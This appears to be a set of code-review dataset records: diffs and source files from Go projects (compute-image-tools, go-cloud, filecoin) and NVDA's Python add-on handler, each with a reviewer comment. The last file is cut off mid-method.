Each waits to be notified to start. for name, s := range w.Steps { go func(name string, s *Step) { // Wait for signal, then run the function. Return any errs. if err := <-start[name]; err != nil { done[name] <- err } else if err := f(s); err != nil { done[name] <- err } close(done[name]) }(name, s) } // Main signaling logic. for len(waiting) != 0 || len(running) != 0 { // If we got a Cancel signal, kill all waiting steps. // Let running steps finish. select { case <-w.Cancel: waiting = map[string][]string{} default: } // Kick off all steps that aren't waiting for anything. for name, deps := range waiting { if len(deps) == 0 { delete(waiting, name) running = append(running, name) close(start[name]) } } // Sanity check. There should be at least one running step, // but loop back through if there isn't. if len(running) == 0 { continue } // Get next finished step. Return the step error if it erred. finished, err := stepsListen(running, done) if err != nil { return err } // Remove finished step from other steps' waiting lists. for name, deps := range waiting { waiting[name] = filter(deps, finished) } // Remove finished from currently running list. running = filter(running, finished) } return nil } func (w *Workflow) isCanceled() bool { select { case <-w.Cancel: return true default: return false } } // New instantiates a new workflow. func New() *Workflow { // We can't use context.WithCancel as we use the context even after cancel for cleanup. w := &Workflow{Cancel: make(chan struct{})} // Init nil'ed fields w.Sources = map[string]string{} w.Vars = map[string]Var{} w.Steps = map[string]*Step{} w.Dependencies = map[string][]string{} w.DefaultTimeout = defaultTimeout w.autovars = map[string]string{} // Resource registries and cleanup. w.disks = newDiskRegistry(w) w.forwardingRules = newForwardingRuleRegistry(w) w.firewallRules = newFirewallRuleRegistry(w) w.images = newImageRegistry(w) w.machineImages = newMachineImageRegistry(w) w.instances = newInstanceRegistry(w) w.networks = newNetworkRegistry(w) w.subnetworks = newSubnetworkRegistry(w) w.objects = newObjectRegistry(w) w.targetInstances = newTargetInstanceRegistry(w) w.snapshots = newSnapshotRegistry(w) w.addCleanupHook(func() DError { w.instances.cleanup() // instances need to be done before disks/networks w.images.cleanup() w.machineImages.cleanup() w.disks.cleanup() w.forwardingRules.cleanup() w.targetInstances.cleanup() w.firewallRules.cleanup() w.subnetworks.cleanup() w.networks.cleanup() w.snapshots.cleanup() return nil }) w.id = randString(5) return w } // NewFromFile reads and unmarshals a workflow file. // Recursively reads subworkflow steps as well. func NewFromFile(file string) (*Workflow, error) { w := New() if err := readWorkflow(file, w); err != nil { return nil, err } return w, nil } // JSONError turns an error from json.Unmarshal and returns a more user // friendly error. func JSONError(file string, data []byte, err error) error { // If this is a syntax error return a useful error. sErr, ok := err.(*json.SyntaxError) if !ok { return err } // Byte number where the error line starts. start := bytes.LastIndex(data[:sErr.Offset], []byte("\n")) + 1 // Assume end byte of error line is EOF unless this isn't the last line. end := len(data) if i := bytes.Index(data[start:], []byte("\n")); i >= 0 { end = start + i } // Line number of error. line := bytes.Count(data[:start], []byte("\n")) + 1 // Position of error in line (where to place the '^'). 
pos := int(sErr.Offset) - start if pos != 0 { pos = pos - 1 } return fmt.Errorf("%s: JSON syntax error in line %d: %s \n%s\n%s^", file, line, err, data[start:end], strings.Repeat(" ", pos)) } func readWorkflow(file string, w *Workflow) DError { data, err := ioutil.ReadFile(file) if err != nil { return newErr("failed to read workflow file", err) } w.workflowDir, err = filepath.Abs(filepath.Dir(file)) if err != nil { return newErr("failed to get absolute path of workflow file", err) } if err := json.Unmarshal(data, &w); err != nil { return newErr("failed to unmarshal workflow file", JSONError(file, data, err)) } if w.OAuthPath != "" && !filepath.IsAbs(w.OAuthPath) { w.OAuthPath = filepath.Join(w.workflowDir, w.OAuthPath) } for name, s := range w.Steps { s.name = name s.w = w } return nil } // stepsListen returns the first step that finishes/errs. func stepsListen(names []string, chans map[string]chan DError) (string, DError) { cases := make([]reflect.SelectCase, len(names)) for i, name := range names { cases[i] = reflect.SelectCase{Dir: reflect.SelectRecv, Chan: reflect.ValueOf(chans[name])} } caseIndex, value, recvOk := reflect.Select(cases) name := names[caseIndex] if recvOk { // recvOk -> a step failed, return the error. return name, value.Interface().(DError) } return name, nil } // IterateWorkflowSteps iterates over all workflow steps, including included // workflow steps, and calls cb callback function func (w *Workflow) IterateWorkflowSteps(cb func(step *Step)) { for _, step := range w.Steps { if step.IncludeWorkflow != nil { //recurse into included workflow step.IncludeWorkflow.Workflow.IterateWorkflowSteps(cb) } cb(step) } } // CancelWithReason cancels workflow with a specific reason. The specific reason replaces "is canceled" in the default error message. func (w *Workflow) CancelWithReason(reason string) { w.cancelReason = reason close(w.Cancel) } func (w *Workflow) getCancelReason() string { cancelReason := w.cancelReason for wi := w; cancelReason == "" && wi != nil; wi = wi.parent { cancelReason = wi.cancelReason } return cancelReason } func (w *Workflow) onStepCancel(s *Step, stepClass string) DError { if s == nil { return nil } cancelReason := w.getCancelReason() if cancelReason == "" { cancelReason = "is canceled" } errorMessageFormat := "Step %q (%s) " + cancelReason + "." s.w.LogWorkflowInfo(errorMessageFormat, s.name, stepClass) return Errf(errorMessageFormat, s.name, stepClass) }
1
13,354
Can this be non-exported to avoid direct use? It would be a breaking change, but using the previous package version would still work.
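A minimal sketch of the unexporting the reviewer suggests; the identifier under review is not shown in this excerpt, so the names below are purely hypothetical. In Go, unexporting is a rename to a lower-case identifier, which removes it from the package's public API — hence the breaking change the reviewer acknowledges.

package example

// Hypothetical names only; the real identifier is not part of this excerpt.

// Before: exported, so any importing package can call it directly.
func PublicHelper() string { return "reachable from other packages" }

// After: unexported, reachable only from inside this package.
func publicHelper() string { return "package-internal only" }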
GoogleCloudPlatform-compute-image-tools
go
@@ -145,7 +145,11 @@ func (w *watcher) ErrorAs(err error, i interface{}) bool { return w.bucket.ErrorAs(err, i) } -// IsNotExist implements driver.IsNotExist. -func (*watcher) IsNotExist(err error) bool { - return gcerrors.Code(err) == gcerrors.NotFound +// ErrorCode implements driver.ErrorCode. +func (*watcher) ErrorCode(err error) gcerrors.ErrorCode { + // err might have come from blob, in which case use its code. + if c := gcerrors.Code(err); c != gcerrors.Unknown { + return c + } + return gcerrors.Unknown }
1
// Copyright 2019 The Go Cloud Development Kit Authors // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // https://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. // Package blobvar provides a runtimevar implementation with // variables read from a blob.Bucket. // Use NewVariable to construct a *runtimevar.Variable. // // As // // blobvar exposes the following types for As: // - Snapshot: Not supported. // - Error: error, which can be passed to blob.ErrorAs. package blobvar // import "gocloud.dev/runtimevar/blobvar" import ( "bytes" "context" "time" "gocloud.dev/blob" "gocloud.dev/gcerrors" "gocloud.dev/runtimevar" "gocloud.dev/runtimevar/driver" ) // Options sets options. type Options struct { // WaitDuration controls the rate at which the blob is polled. // Defaults to 30 seconds. WaitDuration time.Duration } // NewVariable constructs a *runtimevar.Variable backed by the referenced blob. // Reads of the blob return raw bytes; provide a decoder to decode the raw bytes // into the appropriate type for runtimevar.Snapshot.Value. // See the runtimevar package documentation for examples of decoders. func NewVariable(bucket *blob.Bucket, key string, decoder *runtimevar.Decoder, opts *Options) (*runtimevar.Variable, error) { return runtimevar.New(newWatcher(bucket, key, decoder, opts)), nil } func newWatcher(bucket *blob.Bucket, key string, decoder *runtimevar.Decoder, opts *Options) driver.Watcher { if opts == nil { opts = &Options{} } return &watcher{ bucket: bucket, key: key, wait: driver.WaitDuration(opts.WaitDuration), decoder: decoder, } } // state implements driver.State. type state struct { val interface{} updateTime time.Time rawBytes []byte err error } // Value implements driver.State.Value. func (s *state) Value() (interface{}, error) { return s.val, s.err } // UpdateTime implements driver.State.UpdateTime. func (s *state) UpdateTime() time.Time { return s.updateTime } // As implements driver.State.As. func (s *state) As(i interface{}) bool { return false } // errorState returns a new State with err, unless prevS also represents // the same error, in which case it returns nil. func errorState(err error, prevS driver.State) driver.State { s := &state{err: err} if prevS == nil { return s } prev := prevS.(*state) if prev.err == nil { // New error. return s } if err == prev.err || err.Error() == prev.err.Error() { // Same error, return nil to indicate no change. return nil } return s } // watcher implements driver.Watcher for configurations provided by the Runtime Configurator // service. type watcher struct { bucket *blob.Bucket key string wait time.Duration decoder *runtimevar.Decoder } // WatchVariable implements driver.WatchVariable. func (w *watcher) WatchVariable(ctx context.Context, prev driver.State) (driver.State, time.Duration) { // Read the blob. b, err := w.bucket.ReadAll(ctx, w.key) if err != nil { return errorState(err, prev), w.wait } // See if it's the same raw bytes as before. if prev != nil && bytes.Equal(b, prev.(*state).rawBytes) { // No change! return nil, w.wait } // Decode the value. 
val, err := w.decoder.Decode(b) if err != nil { return errorState(err, prev), w.wait } return &state{val: val, updateTime: time.Now(), rawBytes: b}, w.wait } // Close implements driver.Close. func (w *watcher) Close() error { return nil } // ErrorAs implements driver.ErrorAs. // Since blobvar uses the blob package, ErrorAs delegates // to the bucket's ErrorAs method. func (w *watcher) ErrorAs(err error, i interface{}) bool { return w.bucket.ErrorAs(err, i) } // IsNotExist implements driver.IsNotExist. func (*watcher) IsNotExist(err error) bool { return gcerrors.Code(err) == gcerrors.NotFound }
1
14,031
Nit: this is just `return gcerrors.Code(err)`, isn't it?
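The simplification the reviewer points out, sketched against the ErrorCode method in the patch above. Since gcerrors.Code already returns gcerrors.Unknown for errors it does not recognize, the explicit fallback branch is redundant:

// ErrorCode implements driver.ErrorCode.
func (*watcher) ErrorCode(err error) gcerrors.ErrorCode {
	// gcerrors.Code yields gcerrors.Unknown for unrecognized errors,
	// so no separate fallback is needed.
	return gcerrors.Code(err)
}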
google-go-cloud
go
@@ -189,12 +189,7 @@ func (smc *Client) ProposeDeal(ctx context.Context, miner address.Address, data // create payment information totalCost := price.MulBigInt(big.NewInt(int64(pieceSize * duration))) if totalCost.GreaterThan(types.ZeroAttoFIL) { - // The payment setup requires that the payment is mined into a block, currently we - // will wait for at most 5 blocks to be mined before giving up - ctxPaymentSetup, cancel := context.WithTimeout(ctx, 5*smc.api.BlockTime()) - defer cancel() - - cpResp, err := smc.api.CreatePayments(ctxPaymentSetup, porcelain.CreatePaymentsParams{ + cpResp, err := smc.api.CreatePayments(ctx, porcelain.CreatePaymentsParams{ From: fromAddress, To: minerOwner, Value: totalCost,
1
package storage import ( "context" "fmt" "io" "math/big" "time" "github.com/ipfs/go-cid" logging "github.com/ipfs/go-log" "github.com/libp2p/go-libp2p-core/host" "github.com/libp2p/go-libp2p-core/peer" "github.com/libp2p/go-libp2p-core/protocol" "github.com/multiformats/go-multistream" "github.com/pkg/errors" "github.com/filecoin-project/go-filecoin/actor/builtin/miner" "github.com/filecoin-project/go-filecoin/address" cbu "github.com/filecoin-project/go-filecoin/cborutil" "github.com/filecoin-project/go-filecoin/net" "github.com/filecoin-project/go-filecoin/porcelain" "github.com/filecoin-project/go-filecoin/proofs" "github.com/filecoin-project/go-filecoin/protocol/storage/storagedeal" "github.com/filecoin-project/go-filecoin/types" "github.com/filecoin-project/go-filecoin/util/convert" "github.com/filecoin-project/go-sectorbuilder" ) const ( _ = iota // ErrDuplicateDeal indicates that a deal being proposed is a duplicate of an existing deal ErrDuplicateDeal ) // Errors map error codes to messages var Errors = map[uint8]error{ ErrDuplicateDeal: errors.New("proposal is a duplicate of existing deal; if you would like to create a duplicate, add the --allow-duplicates flag"), } const ( // VoucherInterval defines how many block pass before creating a new voucher VoucherInterval = 1000 // ChannelExpiryInterval defines how long the channel remains open past the last voucher ChannelExpiryInterval = 2000 // CreateChannelGasPrice is the gas price of the message used to create the payment channel CreateChannelGasPrice = 1 // CreateChannelGasLimit is the gas limit of the message used to create the payment channel CreateChannelGasLimit = 300 ) type clientPorcelainAPI interface { BlockTime() time.Duration ChainBlockHeight() (*types.BlockHeight, error) CreatePayments(ctx context.Context, config porcelain.CreatePaymentsParams) (*porcelain.CreatePaymentsReturn, error) DealGet(context.Context, cid.Cid) (*storagedeal.Deal, error) DAGGetFileSize(context.Context, cid.Cid) (uint64, error) DAGCat(context.Context, cid.Cid) (io.Reader, error) DealPut(*storagedeal.Deal) error DealsLs(context.Context) (<-chan *porcelain.StorageDealLsResult, error) MessageQuery(ctx context.Context, optFrom, to address.Address, method string, params ...interface{}) ([][]byte, error) MinerGetAsk(ctx context.Context, minerAddr address.Address, askID uint64) (miner.Ask, error) MinerGetSectorSize(ctx context.Context, minerAddr address.Address) (*types.BytesAmount, error) MinerGetOwnerAddress(ctx context.Context, minerAddr address.Address) (address.Address, error) MinerGetWorkerAddress(ctx context.Context, minerAddr address.Address) (address.Address, error) MinerGetPeerID(ctx context.Context, minerAddr address.Address) (peer.ID, error) types.Signer PingMinerWithTimeout(ctx context.Context, p peer.ID, to time.Duration) error WalletDefaultAddress() (address.Address, error) } // Client is used to make deals directly with storage miners. type Client struct { api clientPorcelainAPI host host.Host log logging.EventLogger ProtocolRequestFunc func(ctx context.Context, protocol protocol.ID, peer peer.ID, host host.Host, request interface{}, response interface{}) error } // NewClient creates a new storage client. func NewClient(host host.Host, api clientPorcelainAPI) *Client { smc := &Client{ api: api, host: host, log: logging.Logger("storage/client"), ProtocolRequestFunc: MakeProtocolRequest, } return smc } // ProposeDeal proposes a storage deal to a miner. Pass allowDuplicates = true to // allow duplicate proposals without error. 
func (smc *Client) ProposeDeal(ctx context.Context, miner address.Address, data cid.Cid, askID uint64, duration uint64, allowDuplicates bool) (*storagedeal.SignedResponse, error) { pid, err := smc.api.MinerGetPeerID(ctx, miner) if err != nil { return nil, err } minerAlive := make(chan error, 1) go func() { defer close(minerAlive) minerAlive <- smc.api.PingMinerWithTimeout(ctx, pid, 15*time.Second) }() pieceSize, err := smc.api.DAGGetFileSize(ctx, data) if err != nil { return nil, errors.Wrap(err, "failed to determine the size of the data") } sectorSize, err := smc.api.MinerGetSectorSize(ctx, miner) if err != nil { return nil, errors.Wrap(err, "failed to get sector size") } maxUserBytes := go_sectorbuilder.GetMaxUserBytesPerStagedSector(sectorSize.Uint64()) if pieceSize > maxUserBytes { return nil, fmt.Errorf("piece is %d bytes but sector size is %d bytes", pieceSize, maxUserBytes) } pieceReader, err := smc.api.DAGCat(ctx, data) if err != nil { return nil, errors.Wrap(err, "failed to make piece reader") } // Generating the piece commitment is a computationally expensive operation and can take // many minutes depending on the size of the piece. pieceCommitmentResponse, err := proofs.GeneratePieceCommitment(proofs.GeneratePieceCommitmentRequest{ PieceReader: pieceReader, PieceSize: types.NewBytesAmount(pieceSize), }) if err != nil { return nil, errors.Wrap(err, "failed to generate piece commitment") } ask, err := smc.api.MinerGetAsk(ctx, miner, askID) if err != nil { return nil, errors.Wrap(err, "failed to get ask price") } price := ask.Price chainHeight, err := smc.api.ChainBlockHeight() if err != nil { return nil, err } fromAddress, err := smc.api.WalletDefaultAddress() if err != nil { return nil, err } minerOwner, err := smc.api.MinerGetOwnerAddress(ctx, miner) if err != nil { return nil, err } minerWorker, err := smc.api.MinerGetWorkerAddress(ctx, miner) if err != nil { return nil, err } totalPrice := price.MulBigInt(big.NewInt(int64(pieceSize * duration))) proposal := &storagedeal.Proposal{ PieceRef: data, Size: types.NewBytesAmount(pieceSize), TotalPrice: totalPrice, Duration: duration, MinerAddress: miner, } if smc.isMaybeDupDeal(ctx, proposal) && !allowDuplicates { return nil, Errors[ErrDuplicateDeal] } // see if we managed to connect to the miner err = <-minerAlive if err == net.ErrPingSelf { return nil, errors.New("attempting to make storage deal with self. This is currently unsupported. 
Please use a separate go-filecoin node as client") } else if err != nil { return nil, err } // Always set payer because it is used for signing proposal.Payment.Payer = fromAddress // create payment information totalCost := price.MulBigInt(big.NewInt(int64(pieceSize * duration))) if totalCost.GreaterThan(types.ZeroAttoFIL) { // The payment setup requires that the payment is mined into a block, currently we // will wait for at most 5 blocks to be mined before giving up ctxPaymentSetup, cancel := context.WithTimeout(ctx, 5*smc.api.BlockTime()) defer cancel() cpResp, err := smc.api.CreatePayments(ctxPaymentSetup, porcelain.CreatePaymentsParams{ From: fromAddress, To: minerOwner, Value: totalCost, Duration: duration, MinerAddress: miner, CommP: pieceCommitmentResponse.CommP, PaymentInterval: VoucherInterval, PieceSize: types.NewBytesAmount(pieceSize), ChannelExpiry: *chainHeight.Add(types.NewBlockHeight(duration + ChannelExpiryInterval)), GasPrice: types.NewAttoFIL(big.NewInt(CreateChannelGasPrice)), GasLimit: types.NewGasUnits(CreateChannelGasLimit), }) if err != nil { return nil, errors.Wrap(err, "error creating payment") } proposal.Payment.Channel = cpResp.Channel proposal.Payment.PayChActor = address.PaymentBrokerAddress proposal.Payment.ChannelMsgCid = &cpResp.ChannelMsgCid proposal.Payment.Vouchers = cpResp.Vouchers } signedProposal, err := proposal.NewSignedProposal(fromAddress, smc.api) if err != nil { return nil, err } // send proposal var response storagedeal.SignedResponse // We reset the context to not timeout to allow large file transfers // to complete. err = smc.ProtocolRequestFunc(ctx, makeDealProtocol, pid, smc.host, signedProposal, &response) if err != nil { return nil, errors.Wrap(err, "error sending proposal") } if err := smc.checkDealResponse(ctx, &response, minerWorker); err != nil { return nil, errors.Wrap(err, "response check failed") } // Note: currently the miner requests the data out of band if err := smc.recordResponse(ctx, &response, miner, signedProposal, pieceCommitmentResponse.CommP); err != nil { return nil, errors.Wrap(err, "failed to track response") } smc.log.Debugf("proposed deal for: %s, %v\n", miner.String(), proposal) return &response, nil } func (smc *Client) recordResponse(ctx context.Context, resp *storagedeal.SignedResponse, miner address.Address, p *storagedeal.SignedProposal, commP types.CommP) error { proposalCid, err := convert.ToCid(p) if err != nil { return errors.New("failed to get cid of proposal") } if !proposalCid.Equals(resp.ProposalCid) { return fmt.Errorf("cids not equal %s %s", proposalCid, resp.ProposalCid) } _, err = smc.api.DealGet(ctx, proposalCid) if err == nil { return fmt.Errorf("deal [%s] is already in progress", proposalCid.String()) } if err != porcelain.ErrDealNotFound { return errors.Wrapf(err, "failed to check for existing deal: %s", proposalCid.String()) } return smc.api.DealPut(&storagedeal.Deal{ Miner: miner, Proposal: p, Response: resp, CommP: commP, }) } func (smc *Client) checkDealResponse(ctx context.Context, resp *storagedeal.SignedResponse, workerAddr address.Address) error { valid, err := resp.VerifySignature(workerAddr) if err != nil { return errors.Wrap(err, "Could not verify response signature") } if !valid { return errors.New("Response signature is invalid") } switch resp.State { case storagedeal.Rejected: return fmt.Errorf("deal rejected: %s", resp.Message) case storagedeal.Failed: return fmt.Errorf("deal failed: %s", resp.Message) case storagedeal.Accepted: return nil default: return fmt.Errorf("invalid 
proposal response: %s", resp.State) } } func (smc *Client) minerForProposal(ctx context.Context, c cid.Cid) (address.Address, error) { storageDeal, err := smc.api.DealGet(ctx, c) if err != nil { return address.Undef, errors.Wrapf(err, "failed to fetch deal: %s", c) } return storageDeal.Miner, nil } // QueryDeal queries an in-progress proposal. func (smc *Client) QueryDeal(ctx context.Context, proposalCid cid.Cid) (*storagedeal.SignedResponse, error) { mineraddr, err := smc.minerForProposal(ctx, proposalCid) if err != nil { return nil, err } workerAddr, err := smc.api.MinerGetWorkerAddress(ctx, mineraddr) if err != nil { return nil, err } minerpid, err := smc.api.MinerGetPeerID(ctx, mineraddr) if err != nil { return nil, err } q := storagedeal.QueryRequest{Cid: proposalCid} var resp storagedeal.SignedResponse err = smc.ProtocolRequestFunc(ctx, queryDealProtocol, minerpid, smc.host, q, &resp) if err != nil { return nil, errors.Wrap(err, "error querying deal") } valid, err := resp.VerifySignature(workerAddr) if err != nil { return nil, err } if !valid { return nil, errors.New("deal response has invalid signature") } return &resp, nil } func (smc *Client) isMaybeDupDeal(ctx context.Context, p *storagedeal.Proposal) bool { dealsCh, err := smc.api.DealsLs(ctx) if err != nil { return false } for d := range dealsCh { if d.Deal.Miner == p.MinerAddress && d.Deal.Proposal.PieceRef.Equals(p.PieceRef) { return true } } return false } // LoadVouchersForDeal loads vouchers from disk for a given deal func (smc *Client) LoadVouchersForDeal(ctx context.Context, dealCid cid.Cid) ([]*types.PaymentVoucher, error) { storageDeal, err := smc.api.DealGet(ctx, dealCid) if err != nil { return []*types.PaymentVoucher{}, errors.Wrapf(err, "could not retrieve deal with proposal CID %s", dealCid) } return storageDeal.Proposal.Payment.Vouchers, nil } // MakeProtocolRequest makes a request and expects a response from the host using the given protocol. func MakeProtocolRequest(ctx context.Context, protocol protocol.ID, peer peer.ID, host host.Host, request interface{}, response interface{}) error { s, err := host.NewStream(ctx, peer, protocol) if err != nil { if err == multistream.ErrNotSupported { return errors.New("could not establish connection with peer. Peer does not support protocol") } return errors.Wrap(err, "failed to establish connection with the peer") } if err := cbu.NewMsgWriter(s).WriteMsg(request); err != nil { return errors.Wrap(err, "failed to write request") } if err := cbu.NewMsgReader(s).ReadMsg(response); err != nil { return errors.Wrap(err, "failed to read response") } return nil }
1
20,924
I don't know where this came from, but it's not a good idea. This is actually timing out after 5 rounds, not 5 blocks, and 5 consecutive null blocks won't be that uncommon. Also, when testing with a short block time, this becomes a very short duration that can contribute to flaky tests.
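In code, the reviewer's objection matches the patch above: drop the derived 5*BlockTime() wall-clock window and let the caller's context govern how long payment setup may take. A sketch, with the parameter list abbreviated:

// Before: a wall-clock window of roughly five block-time rounds, which is not
// the same as five mined blocks and becomes very small under a short test
// block time.
//   ctxPaymentSetup, cancel := context.WithTimeout(ctx, 5*smc.api.BlockTime())
//   defer cancel()
//   cpResp, err := smc.api.CreatePayments(ctxPaymentSetup, ...)
//
// After: rely on the caller-supplied context instead of a derived timeout.
cpResp, err := smc.api.CreatePayments(ctx, porcelain.CreatePaymentsParams{
	From:  fromAddress,
	To:    minerOwner,
	Value: totalCost,
	// remaining parameters unchanged from the original call
})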
filecoin-project-venus
go
@@ -47,7 +47,8 @@ def loadState(): global state statePath=os.path.join(globalVars.appArgs.configPath,stateFilename) try: - state = cPickle.load(file(statePath, "r")) + with open(statePath, "r") as f: + state = cPickle.load(f) if "disabledAddons" not in state: state["disabledAddons"] = set() if "pendingDisableSet" not in state:
1
# -*- coding: UTF-8 -*- #addonHandler.py #A part of NonVisual Desktop Access (NVDA) #Copyright (C) 2012-2019 Rui Batista, NV Access Limited, Noelia Ruiz Martínez, Joseph Lee, Babbage B.V., Arnold Loubriat #This file is covered by the GNU General Public License. #See the file COPYING for more details. import sys import os.path import gettext import tempfile import inspect import itertools import collections import pkgutil import shutil from six.moves import cStringIO as StringIO, cPickle from six import string_types import globalVars import zipfile from configobj import ConfigObj from configobj.validate import Validator import config import globalVars import languageHandler from logHandler import log import winKernel import addonAPIVersion from . import addonVersionCheck from .addonVersionCheck import isAddonCompatible MANIFEST_FILENAME = "manifest.ini" stateFilename="addonsState.pickle" BUNDLE_EXTENSION = "nvda-addon" BUNDLE_MIMETYPE = "application/x-nvda-addon" NVDA_ADDON_PROG_ID = "NVDA.Addon.1" ADDON_PENDINGINSTALL_SUFFIX=".pendingInstall" DELETEDIR_SUFFIX=".delete" state={} # addons that are blocked from running because they are incompatible _blockedAddons=set() def loadState(): global state statePath=os.path.join(globalVars.appArgs.configPath,stateFilename) try: state = cPickle.load(file(statePath, "r")) if "disabledAddons" not in state: state["disabledAddons"] = set() if "pendingDisableSet" not in state: state["pendingDisableSet"] = set() if "pendingEnableSet" not in state: state["pendingEnableSet"] = set() except: # Defaults. state = { "pendingRemovesSet":set(), "pendingInstallsSet":set(), "disabledAddons":set(), "pendingEnableSet":set(), "pendingDisableSet":set(), } def saveState(): statePath=os.path.join(globalVars.appArgs.configPath,stateFilename) try: cPickle.dump(state, file(statePath, "wb")) except: log.debugWarning("Error saving state", exc_info=True) def getRunningAddons(): """ Returns currently loaded addons. """ return getAvailableAddons(filterFunc=lambda addon: addon.isRunning) def getIncompatibleAddons( currentAPIVersion=addonAPIVersion.CURRENT, backCompatToAPIVersion=addonAPIVersion.BACK_COMPAT_TO): """ Returns a generator of the add-ons that are not compatible. 
""" return getAvailableAddons( filterFunc=lambda addon: ( not addonVersionCheck.isAddonCompatible( addon, currentAPIVersion=currentAPIVersion, backwardsCompatToVersion=backCompatToAPIVersion ) )) def completePendingAddonRemoves(): """Removes any addons that could not be removed on the last run of NVDA""" user_addons = os.path.abspath(os.path.join(globalVars.appArgs.configPath, "addons")) pendingRemovesSet=state['pendingRemovesSet'] for addonName in list(pendingRemovesSet): addonPath=os.path.join(user_addons,addonName) if os.path.isdir(addonPath): addon=Addon(addonPath) try: addon.completeRemove() except RuntimeError: log.exception("Failed to remove %s add-on"%addonName) continue pendingRemovesSet.discard(addonName) def completePendingAddonInstalls(): user_addons = os.path.abspath(os.path.join(globalVars.appArgs.configPath, "addons")) pendingInstallsSet=state['pendingInstallsSet'] for addonName in pendingInstallsSet: newPath=os.path.join(user_addons,addonName) oldPath=newPath+ADDON_PENDINGINSTALL_SUFFIX try: os.rename(oldPath,newPath) except: log.error("Failed to complete addon installation for %s"%addonName,exc_info=True) pendingInstallsSet.clear() def removeFailedDeletions(): user_addons = os.path.abspath(os.path.join(globalVars.appArgs.configPath, "addons")) for p in os.listdir(user_addons): if p.endswith(DELETEDIR_SUFFIX): path=os.path.join(user_addons,p) shutil.rmtree(path,ignore_errors=True) if os.path.exists(path): log.error("Failed to delete path %s, try removing manually"%path) _disabledAddons = set() def disableAddonsIfAny(): """ Disables add-ons if told to do so by the user from add-ons manager. This is usually executed before refreshing the list of available add-ons. """ global _disabledAddons # Pull in and enable add-ons that should be disabled and enabled, respectively. state["disabledAddons"] |= state["pendingDisableSet"] state["disabledAddons"] -= state["pendingEnableSet"] _disabledAddons = state["disabledAddons"] state["pendingDisableSet"].clear() state["pendingEnableSet"].clear() def initialize(): """ Initializes the add-ons subsystem. """ if config.isAppX: log.info("Add-ons not supported when running as a Windows Store application") return loadState() removeFailedDeletions() completePendingAddonRemoves() completePendingAddonInstalls() # #3090: Are there add-ons that are supposed to not run for this session? disableAddonsIfAny() getAvailableAddons(refresh=True) saveState() def terminate(): """ Terminates the add-ons subsystem. """ pass def _getDefaultAddonPaths(): """ Returns paths where addons can be found. For now, only <userConfig\addons is supported. @rtype: list(string) """ addon_paths = [] user_addons = os.path.abspath(os.path.join(globalVars.appArgs.configPath, "addons")) if os.path.isdir(user_addons): addon_paths.append(user_addons) return addon_paths def _getAvailableAddonsFromPath(path): """ Gets available add-ons from path. An addon is only considered available if the manifest file is loaded with no errors. @param path: path from where to find addon directories. 
@type path: string @rtype generator of Addon instances """ log.debug("Listing add-ons from %s", path) for p in os.listdir(path): if p.endswith(DELETEDIR_SUFFIX): continue addon_path = os.path.join(path, p) if os.path.isdir(addon_path) and addon_path not in ('.', '..'): if not len(os.listdir(addon_path)): log.error("Error loading Addon from path: %s", addon_path) else: log.debug("Loading add-on from %s", addon_path) try: a = Addon(addon_path) name = a.manifest['name'] log.debug( "Found add-on {name} - {a.version}." " Requires API: {a.minimumNVDAVersion}." " Last-tested API: {a.lastTestedNVDAVersion}".format( name=name, a=a )) if a.isDisabled: log.debug("Disabling add-on %s", name) if not isAddonCompatible(a): log.debugWarning("Add-on %s is considered incompatible", name) _blockedAddons.add(a.name) yield a except: log.error("Error loading Addon from path: %s", addon_path, exc_info=True) _availableAddons = collections.OrderedDict() def getAvailableAddons(refresh=False, filterFunc=None): """ Gets all available addons on the system. @param refresh: Whether or not to query the file system for available add-ons. @type refresh: bool @param filterFunc: A function that allows filtering of add-ons. It takes an L{Addon} as its only argument and returns a C{bool} indicating whether the add-on matches the provided filter. @type filterFunc: callable @rtype generator of Addon instances. """ if filterFunc and not callable(filterFunc): raise TypeError("The provided filterFunc is not callable") if refresh: _availableAddons.clear() generators = [_getAvailableAddonsFromPath(path) for path in _getDefaultAddonPaths()] for addon in itertools.chain(*generators): _availableAddons[addon.path] = addon return (addon for addon in _availableAddons.itervalues() if not filterFunc or filterFunc(addon)) def installAddonBundle(bundle): """Extracts an Addon bundle in to a unique subdirectory of the user addons directory, marking the addon as needing install completion on NVDA restart.""" addonPath = os.path.join(globalVars.appArgs.configPath, "addons",bundle.manifest['name']+ADDON_PENDINGINSTALL_SUFFIX) bundle.extract(addonPath) addon=Addon(addonPath) # #2715: The add-on must be added to _availableAddons here so that # translations can be used in installTasks module. _availableAddons[addon.path]=addon try: addon.runInstallTask("onInstall") except: log.error("task 'onInstall' on addon '%s' failed"%addon.name,exc_info=True) del _availableAddons[addon.path] addon.completeRemove(runUninstallTask=False) raise AddonError("Installation failed") state['pendingInstallsSet'].add(bundle.manifest['name']) saveState() return addon class AddonError(Exception): """ Represents an exception coming from the addon subsystem. """ class AddonBase(object): """The base class for functionality that is available both for add-on bundles and add-ons on the file system. Subclasses should at least implement L{manifest}. """ @property def name(self): return self.manifest['name'] @property def version(self): return self.manifest['version'] @property def minimumNVDAVersion(self): return self.manifest.get('minimumNVDAVersion') @property def lastTestedNVDAVersion(self): return self.manifest.get('lastTestedNVDAVersion') class Addon(AddonBase): """ Represents an Add-on available on the file system.""" def __init__(self, path): """ Constructs an L[Addon} from. @param path: the base directory for the addon data. 
@type path: string """ self.path = os.path.abspath(path) self._extendedPackages = set() manifest_path = os.path.join(path, MANIFEST_FILENAME) with open(manifest_path) as f: translatedInput = None for translatedPath in _translatedManifestPaths(): p = os.path.join(self.path, translatedPath) if os.path.exists(p): log.debug("Using manifest translation from %s", p) translatedInput = open(p, 'r') break self.manifest = AddonManifest(f, translatedInput) @property def isPendingInstall(self): """True if this addon has not yet been fully installed.""" return self.path.endswith(ADDON_PENDINGINSTALL_SUFFIX) @property def isPendingRemove(self): """True if this addon is marked for removal.""" return not self.isPendingInstall and self.name in state['pendingRemovesSet'] def requestRemove(self): """Markes this addon for removal on NVDA restart.""" if self.isPendingInstall: self.completeRemove() state['pendingInstallsSet'].discard(self.name) #Force availableAddons to be updated getAvailableAddons(refresh=True) else: state['pendingRemovesSet'].add(self.name) # There's no point keeping a record of this add-on pending being disabled now. # However, if the addon is in _disabledAddons, then it needs to stay there so that # the status in addonsManager continues to say "disabled" 